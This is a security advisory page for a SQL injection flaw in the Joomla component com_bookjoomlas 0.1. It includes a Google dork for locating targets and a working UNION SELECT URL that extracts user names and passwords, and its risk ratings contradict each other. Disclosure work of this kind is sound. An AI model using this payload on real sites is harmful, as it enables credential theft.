Joomla Component com_bookjoomlas 0.1 SQL Injection Vulnerability

2009.04.11
Credit: drosophila
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

******* Salvatore "drosophila" Fresta ******* [+] Application: Joomla Component com_bookjoomlas [+] Version: 0.1 [+] Website: http://www.alikonweb.it [+] Bugs: [A] SQL Injection [+] Exploitation: Remote [+] Dork: inurl:"index.php?option=com_bookjoomlas" [+] Date: 06 Apr 2009 [+] Discovered by: Salvatore "drosophila" Fresta [+] Author: Salvatore "drosophila" Fresta [+] Contact: e-mail: drosophilaxxx@gmail.com ************************************************* [+] Menu 1) Bugs 2) Code 3) Fix ************************************************* [+] Bugs - [A] SQL Injection [-] Security risk: low [-] File affected: sub_commententry.php This bug allows a privileged user to view username and password of a registered user. Like all SELECT vulnerable queries, this can be manipulate to write files on system. ************************************************* [+] Code - [A] SQL Injection http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users ************************************************* [+] Fix No fix. *************************************************

References:

http://xforce.iss.net/xforce/xfdb/49682
http://www.vupen.com/english/advisories/2009/0952
http://www.securityfocus.com/bid/34392
http://www.milw0rm.com/exploits/8353


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top